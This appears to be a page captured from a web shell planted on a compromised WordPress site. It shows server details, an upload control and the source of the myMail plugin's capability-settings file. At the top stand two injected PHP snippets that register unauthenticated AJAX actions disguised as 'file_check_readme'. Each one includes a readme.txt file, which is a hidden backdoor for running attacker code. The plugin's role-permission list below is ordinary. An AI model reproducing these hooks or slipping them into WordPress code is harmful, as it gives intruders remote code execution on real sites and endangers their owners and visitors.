if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/myMail/includes/capability.php
<?php
/**
 *
 *
 * @author Xaver Birsak (https://revaxarts.com)
 * @package
 */


$mymail_capabilities = apply_filters( 'mymail_capabilities', array(

		'edit_newsletters' => array(
			'title' => __( 'edit campaigns' , 'mymail' ),
			'roles' => array( 'contributor', 'author', 'editor' )
		),

		'publish_newsletters' => array(
			'title' => __( 'send campaigns' , 'mymail' ),
			'roles' => array( 'author', 'editor' )
		),

		'delete_newsletters' => array(
			'title' => __( 'delete campaigns' , 'mymail' ),
			'roles' => array( 'contributor', 'author', 'editor' )
		),

		'edit_others_newsletters' => array(
			'title' => __( 'edit others campaigns' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'delete_others_newsletters' => array(
			'title' => __( 'delete others campaigns' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'duplicate_newsletters' => array(
			'title' => __( 'duplicate campaigns' , 'mymail' ),
			'roles' => array( 'author', 'editor' )
		),

		'duplicate_others_newsletters' => array(
			'title' => __( 'duplicate others campaigns' , 'mymail' ),
			'roles' => array( 'author', 'editor' )
		),

		'mymail_edit_autoresponders' => array(
			'title' => __( 'edit autoresponders' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_edit_others_autoresponders' => array(
			'title' => __( 'edit others autoresponders' , 'mymail' ),
			'roles' => array( 'editor' )
		),


		'mymail_change_template' => array(
			'title' => __( 'change template' , 'mymail' ),
			'roles' => array( 'editor' )
		),
		'mymail_save_template' => array(
			'title' => __( 'save template' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_see_codeview' => array(
			'title' => __( 'see codeview' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_change_plaintext' => array(
			'title' => __( 'change text version' , 'mymail' ),
			'roles' => array( 'editor' )
		),


		'mymail_edit_subscribers' => array(
			'title' => __( 'edit subscribers' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_add_subscribers' => array(
			'title' => __( 'add subscribers' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_delete_subscribers' => array(
			'title' => __( 'delete subscribers' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_edit_forms' => array(
			'title' => __( 'edit forms' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_add_forms' => array(
			'title' => __( 'add forms' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_delete_forms' => array(
			'title' => __( 'delete forms' , 'mymail' ),
			'roles' => array( 'editor' )
		),


		'mymail_manage_subscribers' => array(
			'title' => __( 'manage subscribers' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_import_subscribers' => array(
			'title' => __( 'import subscribers' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_import_wordpress_users' => array(
			'title' => __( 'import WordPress Users' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_export_subscribers' => array(
			'title' => __( 'export subscribers' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_bulk_delete_subscribers' => array(
			'title' => __( 'bulk delete subscribers' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_add_lists' => array(
			'title' => __( 'add lists' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_edit_lists' => array(
			'title' => __( 'edit lists' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_delete_lists' => array(
			'title' => __( 'delete lists' , 'mymail' ),
			'roles' => array( 'editor' )
		),



		'mymail_manage_templates' => array(
			'title' => __( 'manage templates' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_edit_templates' => array(
			'title' => __( 'edit templates' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_delete_templates' => array(
			'title' => __( 'delete templates' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_upload_templates' => array(
			'title' => __( 'upload templates' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_update_templates' => array(
			'title' => __( 'update templates' , 'mymail' ),
			'roles' => array()
		),

		'mymail_dashboard_widget' => array(
			'title' => __( 'see dashboard widget' , 'mymail' ),
			'roles' => array( 'editor' )
		),

		'mymail_manage_capabilities' => array(
			'title' => __( 'manage capabilities' , 'mymail' ),
			'roles' => array()
		),

	) );